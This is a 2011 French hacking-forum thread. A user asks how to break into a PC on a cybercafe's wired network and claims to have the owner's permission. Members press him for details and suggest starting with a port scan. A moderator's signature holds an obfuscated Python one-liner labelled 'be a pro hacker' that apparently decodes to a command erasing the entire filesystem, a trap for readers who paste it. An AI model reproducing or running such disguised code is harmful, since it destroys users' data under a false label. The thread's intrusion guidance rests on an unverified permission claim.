Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 05-06-2011 15:25:35

darkos80
Membre Actif

infiltration

salut a tous!

j'ai une question sur une operation en suspend.

en fait voila j'ai envie de prendre le reseau d'un pc qui se trouve sur un reseau local qui est connecté sur un routeur et tout ceci controler par un machine centrale coment puis-je faire?
j'ai du une fois essayer le tool cain and abel mais sans succes et vraiment j'ai envie d'avancer dans cette recherche

aidez-moi:(

merci de votre bonne comprehension!!!

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 05-06-2011 15:46:54

antares145
Membre d'honneur
Site Web

Re : infiltration

merci de votre bonne comprehension!!!

Je ne suis pas sûr qu'elle soit bonne justement... Bon, déjà je ne comprends pas la description de l'architecture (mais ça c'est peut-être moi qui suis fatigué), mais surtout je n'ai pas (du tout !) l'impression que le réseau est à toi et/ou que tu as la permission de l'attaquer. Rien que l'expression "prendre le réseau d'un PC" (qui au passage ne veut rien dire) en dit long sur tes intentions roll

Donne moi une bonne raison de croire que tu as effectivement le droit de t'attaquer à ce réseau, ou bien relis la section 3 des Règles pour avoir une idée de ce qui va se passer wink

#3 05-06-2011 16:11:21

darkos80
Membre Actif

en fait il s'agit de tester le niveau de  securite du cyber-cafe de mon puisque lui il m'en a donné la permision et avec
une prime a l'appui si j'y arrive donc voila pourquoi je veux absolument essayer ce truc!

#4 05-06-2011 16:51:00

antares145
Membre d'honneur
Site Web

tester le niveau de  securite du cyber-cafe de mon puisque lui il m'en a donné la permision

Avec tous les mots c'est bien aussi... Bon, on va dire que ça passe roll

Ceci dit, je ne comprends toujours pas la structure du réseau en question...
- tu veux prendre le contrôle d'un réseau filaire ou sans fil ?
- si c'est sans-fil, quel est le niveau de protection (donnes-nous un max de détail, voire un screenshot d'airodump-ng)
- si c'est filaire, qu'est-ce que tu veux arriver à faire exactement ?

PS : s'il  y a une prime en jeu, tu devras la mériter toi-même, on ne te donnera pas une solution en détails tongue

#5 08-06-2011 18:58:18

darkos80
Membre Actif

merci pourton soutien
primo le reseau est filaire(7 machines reliés a un routeur )
deuxio les 7 machines sont controlées par un ordinateur central qi fait office de serveur
mais bon j'ai pu avancer et pouvoir avoir l'adresse du routeur toute fois il me faut le cracker avec quels tools je peux le faire?
merci
et s'il vous plait est ce qu'il n'y aurai pas un chan irc pour le site sur irc?si oui envoyez moi le nom du channel

#6 08-06-2011 19:26:55

toto
Membre V.I.P.
Lieu : chez le docteur aussi

pour l'irc on en avais eu un pour le développement de gtwpa mais je doute que tu y trouve du monde ^^

#7 08-06-2011 21:05:04

spawn
Modérateur

Qu'est-ce que tu veux faire ?
Qu'entends-tu par 'cracker' ?

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#8 08-06-2011 21:44:26

antares145
Membre d'honneur
Site Web

les 7 machines sont controlées par un ordinateur central qi fait office de serveur

Contrôlées, c-'est-à-dire ? Quel genre de contrôle ? C'est juste un point de filtrage pour le trafic ou tu peux vraiment prendre le contrôle des machines depuis le serveur (VNC,...) ?

Et puis ça ne répond toujours pas à la question : qu'est-ce que tu veux faire exactement ? Donne un exemple concret parce que là on est dans le grand flou artistique...

il me faut le cracker avec quels tools je peux le faire?

Pour le cracker, je conseille une hache, ou à la rigueur une tronçonneuse mais c'est moins discret... Sérieux, tu ne sais même pas ce que tu veux cracker (quel service ? quel port ? quel protocole ? quel but ? quelle galère !), comment tu veux qu'on te conseille un outil pour le faire ? smile

Commence par faire un scan de ports sur le serveur, regarde ceux qui sont ouverts et identifie les services qui sont derrière. Avec ça, tu peux commencer à réfléchir à ta stratégie d'attaque...

Annonce